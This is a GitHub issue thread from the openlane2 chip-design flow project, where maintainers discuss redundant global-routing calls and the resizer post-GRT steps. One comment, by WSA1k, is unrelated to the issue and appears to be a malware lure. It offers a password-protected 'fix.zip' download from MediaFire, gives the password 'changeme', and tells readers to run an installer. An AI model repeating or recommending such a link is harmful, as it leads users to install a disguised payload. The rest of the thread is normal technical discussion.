chipfoundry/openlane2 #538: Optimize Global Routing and Resizer PostGRT steps

kareefardi, 2024-08-26:
### Description

As it turns out estimating routing parasitics in OR needs a call for GRT in that instance. Some steps in the Classic flow use this. At the moment there are a lot of redundant GRT calls that slows down the flow in large designs.   

### Proposal

Access and revisit the situation. Additionally, `GRT_RESIZER_RUN_GRT` should only disable the final GRT step in the design. Finally, we should access incremental routing as well.

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

donn, 2024-08-26:
Wasn't this addressed in https://github.com/efabless/openlane2/commit/a8a6e84d4970c94641f2be62c8bc709ca353ed59

kareefardi, 2024-08-26:
> Wasn't this addressed in [a8a6e84](https://github.com/efabless/openlane2/commit/a8a6e84d4970c94641f2be62c8bc709ca353ed59)

No. The solution is not complete and wrong given the current state of OR db.

donn, 2024-08-26:
Elaborate.

kareefardi, 2024-08-26:
The solution doesn't consider other places in the flow that uses GRT parasitics estimation.  It doesn't consider that there is a redundant GRT run before `OpenROAD.RepairDesignPostGRT` for example. 
It is wrong because it turns out that GRT is needed in the same script as the ones modified in the PR. A similar PR should only disable GRT ran after calling resizer.

donn, 2024-08-26:
If this is a Classic flow issue, not a step issue, that's a separate discussion. For the giant designs in question our PnR engineers tend to define custom sequential flows in the JSON…